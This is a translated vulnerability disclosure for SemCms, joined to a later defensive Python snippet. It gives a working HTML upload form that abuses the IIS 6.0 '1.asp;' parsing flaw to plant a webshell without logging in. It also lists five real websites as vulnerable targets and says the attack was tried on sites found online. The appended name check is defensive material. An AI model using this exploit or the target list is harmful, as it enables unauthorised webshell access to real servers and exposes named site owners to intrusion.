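2015-05-14: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-06-28: The vendor has actively ignored the vulnerability; details disclosed to the public
No login is required: a crafted form can obtain a webshell directly through the IIS 6.0 parsing vulnerability. Official site:
http://www.sem-cms.com/ SemCms foreign trade website management system official website!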
Upload Vulnerability:
/clkj_admin/upfile.asp: a crafted form that sets the custom name to "1.asp;" can trigger the parsing vulnerability
Case:
http://www.yikai-auto.com/clkj_admin/upfile.asp
http://progloballight.com/clkj_admin/upfile.asp
http://www.1dragon.net/clkj_admin/upfile.asp
http://www.stdfled.com//clkj_admin/upfile.asp
http://www.apexcool.com/clkj_admin/upfile.asp
EXP: (This vulnerability is high-impact; do not use it for illegal purposes, otherwise you bear the consequences yourself!)
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="backdoor.css" type="text/css" rel="stylesheet">
<script language="javascript">
<!--
function mysub()
{
 esave.style.visibility="visible";
}
-->
</script>
</head>
<body>
<form name="form1" method="post" action="http://www.******.com//clkj_admin/upfile.asp" enctype="multipart/form-data" >
 <div id="esave" style="position:absolute; top:18px; left:40px; z-index:10; visibility:hidden">
 <TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0>
 <TR>
 <td width=20%></td>
 <TD bgcolor=#ff0000 width="60%"><TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0>
 <TR>
 <td bgcolor=#ffffff align=center><font color=red>正在上传文件,请稍候...</font></td>
 </tr>
 </table></td>
 <td width=20%></td>
 </tr>
 </table>
 </div>
 <table width="95%" border="0" align="center" cellspacing="1" bgcolor="#FFFFFF">
 <tr>
 <td align="center" height="50"> <strong>图片上传</strong>
 <input type="hidden" name="filepath" value="../Clkj_Images/upfile/">
 <input type="hidden" name="filelx" value="jpg">
 <input type="hidden" name="EditName" value="clkj_prpic_1">
 <input type="hidden" name="FormName" value="products">
 <input type="hidden" name="act" value="uploadfile">
 </td>
 </tr>
 <tr >
 <td align="center" id="upid" height="30">自定义图片名称
 <input name="imgname" type="text" id="imgname" size="20" class="tx1" >
 <font color="#FF0000">注意:此项为空即,随机生成图片文件名</font>
 </td>
 </tr>
 <tr >
 <td align="center" id="upid" height="50">选择文件:
 <input type="file" name="file1" size="45" class="tx1" value="">
 <input type="submit" name="Submit" value="开始上传" onClick="javascript:mysub()">
 </td>
 </tr>
 </table>
</form>
</body>
</html>
Tested against arbitrary cases found on the Internet
1.
Unable to contact the vendor, or the vendor actively declined
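Added example (not part of the original report and not SemCms code): a server-side check on the stored upload name that rejects the "1.asp;" style custom name described above, written in Python for illustration. It assumes that upfile.asp builds the stored name as imgname + "." + filelx and that only image uploads are intended; all function names are hypothetical.

```python
import re
import secrets

# Assumption: the endpoint is meant to accept images only.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Caller-supplied base names: no dot, semicolon, slash, backslash or colon.
SAFE_BASE = re.compile(r"[A-Za-z0-9_-]{1,64}")
# A script extension followed by ';', a path separator or the end of the name.
# .asa/.cer/.cdx are included because IIS 6.0 also maps them to asp.dll.
SCRIPT_SEGMENT = re.compile(r"\.(asp|asa|cer|cdx)(;|/|\\|$)", re.IGNORECASE)


def naive_name(imgname: str, filelx: str) -> str:
    """Assumed behaviour of the vulnerable handler: plain concatenation."""
    return f"{imgname}.{filelx}"


def is_parse_trick(name: str) -> bool:
    """True if IIS 6.0 would hand a file with this name to the ASP engine."""
    return bool(SCRIPT_SEGMENT.search(name))


def stored_name(imgname: str, filelx: str) -> str:
    """Return the file name to write to disk, or raise ValueError."""
    ext = filelx.lower()
    if ext not in ALLOWED_EXT:          # filelx is a client-controlled hidden field
        raise ValueError(f"extension not allowed: {filelx!r}")
    if imgname == "":
        base = secrets.token_hex(8)     # empty name: random file name, as the form states
    elif SAFE_BASE.fullmatch(imgname):
        base = imgname
    else:
        raise ValueError(f"illegal characters in name: {imgname!r}")
    name = f"{base}.{ext}"
    if is_parse_trick(name):            # second line of defence on the final name
        raise ValueError(f"name would be parsed as script: {name!r}")
    return name


if __name__ == "__main__":
    # Constructed sample inputs: the form's default name, the reported name, empty.
    for imgname in ("clkj_prpic_1", "1.asp;", ""):
        candidate = naive_name(imgname, "jpg")
        try:
            print(repr(candidate), is_parse_trick(candidate), stored_name(imgname, "jpg"))
        except ValueError as err:
            print(repr(candidate), is_parse_trick(candidate), "rejected:", err)
```

The name check does not replace authentication on the upload endpoint or disabling script execution in the upload directory.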